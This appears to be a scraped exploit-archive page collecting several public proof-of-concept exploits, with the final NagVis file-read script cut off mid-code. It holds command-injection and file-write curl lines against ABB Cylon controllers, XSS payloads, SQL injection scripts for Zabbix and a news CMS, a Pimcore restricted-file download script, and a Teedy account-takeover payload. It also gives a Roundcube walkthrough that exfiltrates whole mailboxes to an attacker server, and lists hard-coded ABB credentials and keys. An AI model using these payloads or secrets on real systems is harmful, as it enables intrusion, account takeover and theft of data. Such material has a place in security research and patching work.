░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl http://192.168.73.31/factorySetSerialNum.php \ > -d "serial=;sleep 2&ManufactureDate=;sleep 3"
HireHackking

ABB Cylon Aspect 4.00.00 (factorySaved.php) - Unauthenticated XSS

HACKER · %s · %s

# Exploit title: ABB Cylon Aspect 4.00.00 (factorySaved.php) Unauthenticated XSS # Vendor: ABB Ltd. # Product web page: https://www.global.abb # Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=4.00.00 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated reflected cross-site scripting vulnerability in the 'title' GET parameter. Input is not properly sanitized before being returned to the user, allowing the execution of arbitrary HTML/JS code in a user's browser session in the context of the affected site. While the factory test scripts included in the upgrade bundle are typically deleted, a short window for exploitation exists when the device is in the manufacturing phase. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) ErgoTech MIX Deployment Server 2.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5893 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5893.php 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ http://192.168.73.31/factorySaved.php?title=<script>console.log('ZSL')</script>
HireHackking

Zabbix 7.0.0 - SQL Injection

HACKER · %s · %s

# Exploit Title: Zabbix 7.0.0 - SQL Injection # Date: 06/12/2024 # Exploit Author: Leandro Dias Barata @m4nb4 # Vendor Homepage: https://www.zabbix.com/ # Software Link: https://support.zabbix.com/browse/ZBX-25623 # Version: 6.0.0 - 6.0.31 / 6.0.32rc1 6.4.0 - 6.4.16 / 6.4.17rc1 7.0.0 # Tested on: Kali Linux kali-linux-2024.3 # CVE: CVE-2024-42327 import requests import argparse HEADERS = {"Content-Type": "application/json"} def main(): parser = argparse.ArgumentParser(description="CHECK for CVE-2024-42327") parser.add_argument("-t", "--target", required=True, help="API URL") parser.add_argument("-u", "--username", required=True, help="Username") parser.add_argument("-p", "--password", required=True, help="Password") args = parser.parse_args() url = f"{args.target.rstrip('/')}/api_jsonrpc.php" # Login to get the token login_data = { "jsonrpc": "2.0", "method": "user.login", "params": {"username": args.username, "password": args.password}, "id": 1, "auth": None } try: login_response = requests.post(url, json=login_data, headers=HEADERS) login_response.raise_for_status() auth_token = login_response.json().get("result") # Simple SQLi test data = { "jsonrpc": "2.0", "method": "user.get", "params": { "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"], "userids": ["1", "2"] }, "id": 1, "auth": auth_token } test_response = requests.post(url, json=data, headers=HEADERS) test_response.raise_for_status() if "error" in test_response.text: print("[-] NOT VULNERABLE.") else: print("[!] VULNERABLE.") except requests.RequestException as e: print(f"[!] Request error: {e}") if __name__ == "__main__": main()
HireHackking
# Exploit title: ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) File Write DoS # Vendor: ABB Ltd. # Product web page: https://www.global.abb # Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.03 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated arbitrary content injection vulnerability in the webServerDeviceLabelUpdate.php script due to a lack of input validation. Authenticated attackers can exploit the 'deviceLabel' POST parameter to write arbitrary content to a fixed file location at /usr/local/aam/etc/deviceLabel, potentially causing a denial of service. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) ErgoTech MIX Deployment Server 2.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5892 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5892.php 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl http://192.168.73.31/webServerDeviceLabelUpdate.php \ > -H "Cookie: PHPSESSID=xxx" \ > -d "deviceLabel=`printf '%.0sA' {1..10000}`"\ > # --data-urlencode "deviceLabel@largecontent.txt" $ curl http://192.168.73.31/webServerConfiguration.php | grep AAA
HireHackking

Pimcore customer-data-framework 4.2.0 - SQL injection

HACKER · %s · %s

# Exploit Title: Pimcore customer-data-framework 4.2.0 - SQL injection # Date: 01/28/2025 # Exploit Author: maeitsec # Vendor Homepage: https://pimcore.com/ # Software Link: https://github.com/pimcore/pimcore # Version: Pimcore versions prior to 10.5.21 # Tested on: Ubuntu 20.04 with Pimcore 10.5.20 # CVE: CVE-2024-11956 import requests # Replace with target URL and credentials TARGET_URL = "http://example.com/pimcore" USERNAME = "low_privilege_user" PASSWORD = "password123" # Authenticate and get session session = requests.Session() login_data = { "username": USERNAME, "password": PASSWORD } login_response = session.post(f"{TARGET_URL}/admin/login", data=login_data) if "Login successful" in login_response.text: print("[+] Authenticated successfully.") # Exploit the downloadAsZip functionality download_url = f"{TARGET_URL}/admin/asset/download-as-zip" payload = { "ids[]": ["1", "2", "3"] # Replace with IDs of restricted files/folders } download_response = session.post(download_url, data=payload) if download_response.status_code == 200: print("[+] Exploit successful. Restricted files downloaded.") with open("restricted_files.zip", "wb") as f: f.write(download_response.content) else: print("[-] Exploit failed. Server returned:", download_response.status_code) else: print("[-] Authentication failed.")
HireHackking

Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS) # Google Dork: # Exploit Author: AmirZargham # Vendor Homepage: Roundcube - Free and Open Source Webmail Software # Software Link: Releases · roundcube/roundcubemail # Version: Roundcube client version earlier than 1.5.6 or from 1.6 to 1.6.6. # Tested on: firefox,chrome # CVE: CVE-2024-37383 # CWE: CWE-79 # Platform: MULTIPLE # Type: WebApps Description: The CVE-2024-37383 vulnerability was discovered in the Roundcube Webmail email client. This is a stored XSS vulnerability that allows an attacker to execute JavaScript code on the user's page. To exploit the vulnerability, all attackers need to do is open a malicious email using a Roundcube client version earlier than 1.5.6 or from 1.6 to 1.6.6. Usage Info:1 - open the Roundcube_mail_server_exploit_for_CVE-2024-37383.txt and export js file.2 - Change the web address of the original email (target) and the URL of the receiving server (attacker server).3 - You can put the code in file SVG <animate> tag and send it to the server. (can use this https://github.com/bartfroklage/CVE-2024-37383-POC)4 - After the victim clicks, all emails in the mailbox will be sent to your collaborator server. This code automates the process of retrieving all messages inbox from a Roundcube webmail server and forwarding that data to a specific collaborator server endpoint.Here’s a step-by-step breakdown: - Setup URLs: - The main webmail URL (target) and the receiving server URL (attackerserver) are defined as variables at the beginning for easy configuration. - Get Total Page Count: - The getPageCount function sends a GET request to the main webmail URL to fetch metadata, including the total number of pages (pagecount). - If pagecount is found, it proceeds to loop through each page. - Fetch Message IDs from All Pages: - For each page from 1 to pagecount, it constructs a paginated URL to request that page. - Each page’s response is checked for instances of add_message_row(NUMBER) using regex, extracting message IDs from each instance and collecting all IDs in a single list. - Retrieve Each Message's Content: - For each message ID, the code constructs a URL to request detailed data about that message. - It sends a GET request for each message ID URL, receiving the full response HTML. - Extract and Clean Message Data: - Within each message response, it uses regex to capture the <title> (message title) and main message content. - Any HTML tags are stripped from the message content to keep only the plain text. - Send the Data to the Server: - For each extracted message, a POST request is made to the server endpoint with the title and cleaned message content, URL-encoded for proper transmission.
HireHackking

NEWS-BUZZ News Management System 1.0 - SQL Injection

HACKER · %s · %s

# Exploit Title: NEWS-BUZZ News Management System 1.0 - SQL Injection # Google Dork: N/A # Exploit Author: egsec # Date: 2024-11-03 # Vendor Homepage: https://code-projects.org # Software Link: https://code-projects.org/content-management-system-in-php-with-source-code-2/ # Version: 1.0 # Tested on: Windows 11 Pro # Impact: The manipulation of the argument user_name with an unknown input leads to a sql injection vulnerability # CVE : CVE-2024-10758 ## Vulnerability Description: There is a SQL injection vulnerability in the login part of the index.php file. It allows an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database. ## Vulnerable code section: In the source code, you can find vulnerable code in the NEWS-BUZZ/login.php file: <?php ... $query = "SELECT * FROM users WHERE username = '$username'"; $result = mysqli_query($conn, $query) or die(mysqli_error($conn)); ... ?> In this line, the $username variable is directly embedded into the SQL query without proper handling. This allows an attacker to inject malicious SQL code. ## Proof of Concept (PoC): 1.Location: http://localhost/NEWS-BUZZ/index.php 2.Time-Based SQL Injection Payload: ' OR sleep(10)# 3.PoC request: POST /NEWS-BUZZ/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 69 Origin: http://localhost Connection: close Referer: http://localhost/NEWS-BUZZ/index.php Cookie: PHPSESSID=456n0gcbd6d09ecem39lrh3nu9 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u=0, i user_name=admin%27+or+sleep%2810%29%23&user_password=adminpass&login= 4.PoC response: The response will come called time by using sleep() function.
HireHackking

ABB Cylon Aspect 3.08.03 - Hard-coded Secrets

HACKER · %s · %s

ABB Cylon Aspect 3.08.03 Hard-coded Secrets Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.03 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The ABB Cylon Aspect BMS/BAS controller contains multiple instances of hard-coded credentials, including usernames, passwords, and encryption keys embedded in various java classes. This practice poses significant security risks, allowing attackers to gain unauthorized access and compromise the system's integrity. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) ErgoTech MIX Deployment Server 2.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5896 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5896.php 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ cat secrets.txt - SynchronizedSecurityServicesHandler.class -> CrET8MEbraME4ahu - MapInvisibleSchedule.class -> calendar:user - WDSupervisor.class -> aamservletuser:kakideco - AESCipher2.class -> uajo4nzibb$#1E4V5262b17f-c3d5-4190-a442-6d251f9da52b - AESCipher.class -> default - BrokerURL.class -> aamuser:default - Schedule.class -> calendar:user - BfUtils.class -> CrET8MEbraME4ahu - Context.class -> \037jchabucos:friske - Db.class -> matrixac1:aam
HireHackking

ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure

HACKER · %s · %s

ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.02 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The application suffers from cleartext transmission and storage of sensitive information in a Cookie. This includes the globals parameter, where authdata contains base64-encoded credentials. A remote attacker can intercept the HTTP Cookie, including authentication credentials, through a man-in-the-middle attack, potentially compromising user accounts and sensitive data. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) ErgoTech MIX Deployment Server 2.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5895 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5895.php CVE ID: CVE-2024-51546 CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-51546 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ Cookie: PHPSESSID=xxx; context1=xxx; globals={"currentUser":{"username":"aamuser","authdata":"YWFtdXNlcjpkZWZhdWx0","mangledAuth":"bXVidmZnO2Vmc3Z0Ym45YjczMzY2ODo6MjQyODQ7Mg==","loginExpirySeconds":0},"loggedIn":true,"lang":"en"}; cod=5.27; connect.sid=xxx; csd=44
HireHackking

phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS) # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/thorsten/phpMyFAQ # Software Link: https://github.com/thorsten/phpMyFAQ # Version: 3.1.7 # Tested on: Ubuntu Windows # CVE : CVE-2022-4407 PoC: Get: http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script> Details: { "Sink": "phpmyfaq/admin/header.php - HTML attribute in the form action parameter", "Vulnerable Variable": "action", "Source": "phpmyfaq/admin/index.php - Filter::filterInput(INPUT_GET, 'action', FILTER_UNSAFE_RAW)", "Sanitization Mechanisms Before Patch": "None - Input directly used without escaping or encoding in the HTML attribute", "Sink Context Constraints": "HTML attribute context - needs proper escaping to break out of attribute", "Attack Payload": "\"><script>alert('XSS')</script>", "Execution Path Constraints": "The 'action' parameter must be passed via GET or POST without prior sanitization or if it is null, it must be taken from 'redirect-action' parameter unless it equals 'logout'", "Request Parameters": "action", "Request URL": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>", "Request Method": "GET", "Final PoC": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>" } [Replace Your Domain Name]
HireHackking
# Exploit Title: Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS) # Exploit Author: Ayato Shitomi @ Fore-Z co.ltd # Demo Video: https://www.youtube.com/watch?v=udQgVogsmhA # Vendor Homepage: https://teedy.io/ # Software Link: https://github.com/Tomblib0/Teedy # Version: 1.11 # Tested on: Linux # CVE : CVE-2024-46278 There is a vulnerability that causes XSS when downloading files. XSS vulnerability could allow a Teedy administrator to rob an account with a few clicks. Login as an attacker’s account. Upload this file as html type. You have to change “Origin” and “Referer” and argument for fetch in need. ``` <script> const currentCookie = document.cookie; const requestOptions = { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', 'Accept': 'application/json, text/plain, */*', 'Cookie': currentCookie, 'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120"', 'sec-ch-ua-mobile': '?0', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36', 'sec-ch-ua-platform': '"Linux"', 'Origin': 'http://localhost:8080', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Dest': 'empty', 'Referer': 'http://localhost:8080/', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'en-US,en;q=0.9' }, body: 'password=superSecure2&passwordconfirm=superSecure2' }; fetch('http://localhost:8080/api/user', requestOptions) .then(response => { if (!response.ok) { throw new Error('Network response was not ok'); } document.write('<h1>Your account was taken over by the attacker LOL</h1>'); return response.json(); }) .then(data => console.log(data)) .catch(error => console.error('There was a problem with your fetch operation:', error)); </script> ``` Login with another account. eg. admin Click on the file uploaded by the attacker and select Download this file.
HireHackking

NagVis 1.9.33 - Arbitrary File Read

HACKER · %s · %s

# Exploit Title: NagVis 1.9.33 - Arbitrary File Read # Date: 03/12/2024 # Exploit Author: David Rodríguez a.k.a. xerosec # Vendor Homepage: https://www.nagvis.org/ # Software Link: https://www.nagvis.org/downloads/archive # Version: 1.9.33 # Tested on: Linux # CVE: CVE-2022-46945 import requests import argparse import json from urllib.parse import urljoin def authenticate(target_url, username, password): url = urljoin(target_url, '/nagvis/frontend/nagvis-js/index.php') headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"} data = {"_username": username, "_password": password, "submit": "Login"} try: response = requests.post(url, headers=headers, data=data) if response.status_code == 200 and "Set-Cookie" in response.headers: print("[✔] Authentication successful.") return response.headers["Set-Cookie"] print(f"[✘] Authentication failed. Status code: {response.status_code}") except Exception as e: print(f"[✘] Request error: {e}") return None def exploit(target_url, session_cookie, file_path): url = urljoin(target_url, '/nagvis/server/core/ajax_handler.php') headers = {"User-Agent": "Mozilla/5.0", "Cookie": session_cookie} params = {"mod": "General", "act": "getHoverUrl", "url[]": f"file://{file_path}"} try: response = requests.get(url, headers=headers, params=params) if response.status_code == 200: print("[✔] Exploitation successful. File content:\n") display_file_content(response.text) else: print(f"[✘] Exploitation failed. Status code: {response.status_code}") except Exception as e: print(f"[✘] Request error: {e}") def display_file_content(raw_response): try: data = json.loads(raw_response) if isinstance(data, list) and len(data) > 0 and isinstance(data[0], dict) and "code" in data[0]: content = data[0]["code"] # Decodificar escapes de manera segura content = content.encode('utf-8').decode('unicode_escape') print(content.strip()) else: print("[✘] Unexpected JSON structure.") except json.JSONDecodeError as jde: print(f"[✘] JSON decoding error: {jde}") except Exception as e: print(f"[✘] Unexpected error during output processing: {e}") def main(): parser = argparse.ArgumentParser(description="Exploit for CVE-2022-46945 (File Read Vulnerability)") parser.add_argument("-t", "--target", required=True, help="Target base URL (e.g., http://10.0.2.132)") parser.add_argument("-u", "--username", required=True, help="Username for authentication") parser.add_argument("-p", "--password", required=True, 